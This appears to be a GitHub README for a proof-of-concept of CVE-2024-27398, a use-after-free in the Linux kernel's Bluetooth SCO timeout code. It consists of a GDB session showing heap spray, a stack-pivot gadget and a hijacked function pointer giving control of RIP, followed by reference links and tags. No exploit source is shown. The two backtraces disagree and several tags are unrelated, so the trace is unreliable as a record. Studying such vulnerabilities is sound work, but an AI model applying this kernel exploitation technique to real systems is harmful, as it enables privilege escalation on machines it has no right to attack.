secunnix/CVE-2024-27398

# CVE-2024-27398 CVE-2024-27398 POC ## 📍 GDB 断点 ``` GNU gdb (Ubuntu 12.1-0ubuntu1~22.04.2) 12.1 Copyright (C) 2022 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: . Find the GDB manual and other documentation resources online at: . For help, type "help". Type "apropos word" to search for commands related to "word". (gdb) file vmlinxsef680 Reading symbols from vmlinxsef680... (gdb) target remote :1234 Remote debugging using :1234 Thread 4 (kworker/0:1): #0 0xdeadbeefcafebabe in ?? () ← RIP = spray payload #1 0xffffffff81019fc0 in xchg_eax_esp_ret () ← stack pivot gadget #2 0xffffffff840e0134 in sco_sock_timeout+0x134 () ← sk->sk_state_change(sk) call site (gdb) info registers rax 0xdeadbeefcafebabe ← spray'den okunan sk_state_change değeri rbx 0xffff88810ab8f000 ← freed+sprayed sock adresi (sk) rcx 0xffffffff812ec563 rdx 0x1ffff11021571e94 rsi 0x00000000fffffe00 rdi 0xffff88810ab8f000 ← sk (1. argüman = sock pointer) rsp 0xffff8881002cfcb8 ← kernel stack (pivot öncesi) rip 0xdeadbeefcafebabe ← KONTROLLÜ RIP! (gdb) x/8gx $rdi 0xffff88810ab8f000: 0xdeadbeefcafebabe 0xdeadbeefcafebabe ← spray verisi 0xffff88810ab8f010: 0xdeadbeefcafebabe 0xdeadbeefcafebabe 0xffff88810ab8f020: 0xdeadbeefcafebabe 0xdeadbeefcafebabe (gdb) x/gx $rdi+0x2a0 0xffff88810ab8f2a0: 0xdeadbeefcafebabe ← sk_state_change = spray payload (gdb) bt #0 0xdeadbeefcafebabe in ?? () #1 __x86_indirect_thunk_array+0xa () at retpoline #2 sco_sock_timeout+0x134 () at net/bluetooth/sco.c:98 #3 process_one_work+0x7cb () at kernel/workqueue.c #4 worker_thread+0x867 () at kernel/workqueue.c #5 kthread+0x2bf () at kernel/kthread.c References https://github.com/qiutianshu/sco-race-condition https://www.openwall.com/lists/oss-security/2024/11/29/1 ```

标签：CVE-2024-27398, EXP, GDB, Linux内核, POC, ROP, sk_state_change, UAF, Web报告查看器, 二进制分析, 云安全运维, 内核提权, 堆喷射, 安全渗透, 客户端加密, 栈迁移, 漏洞复现, 网络安全, 蓝牙, 调试, 释放后重用, 隐私保护